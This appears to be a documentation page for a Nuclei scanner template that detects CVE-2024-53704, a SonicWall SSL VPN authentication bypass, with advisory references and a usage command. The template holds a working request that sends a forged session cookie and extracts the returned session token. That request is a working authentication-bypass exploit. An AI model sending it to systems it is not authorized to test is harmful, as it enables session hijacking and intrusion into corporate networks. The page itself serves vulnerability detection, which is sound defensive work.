Skip to content

SSL VPN Session Hijacking

ID: CVE-2024-53704

Severity: critical

Author: johnk3r

Tags: cve,cve2024,sonicwall,kev

An Improper Authentication vulnerability in the SSLVPN authentication mechanism allows a remote attacker to bypass authentication.

id: CVE-2024-53704
info:
name: SSL VPN Session Hijacking
author: johnk3r
severity: critical
description: |
An Improper Authentication vulnerability in the SSLVPN authentication mechanism allows a remote attacker to bypass authentication.
reference:
- https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-53704
cwe-id: CWE-287
epss-score: 0.00043
epss-percentile: 0.1146
metadata:
verified: true
max-request: 1
shodan-query: "http.html_hash:-1466805544"
tags: cve,cve2024,sonicwall,kev
http:
- raw:
- |
GET /cgi-bin/sslvpnclient?launchplatform= HTTP/1.1
Host: {{Hostname}}
Cookie: swap=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
Connection: close
matchers-condition: and
matchers:
- type: word
words:
- "NELaunchX1"
- type: status
status:
- 200
extractors:
- type: regex
part: header
regex:
- 'Set-Cookie: swap=([a-zA-Z0-9]+);'
# digest: 4b0a00483046022100879d397a6026d446ebd2681d1f8c899486852db6500415b2ab3d3452cb32f71b022100a738b046b7663c78121478de2b7a0a596e99672c211a7821441cf87a1706cf46:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-53704.yaml"

View on Github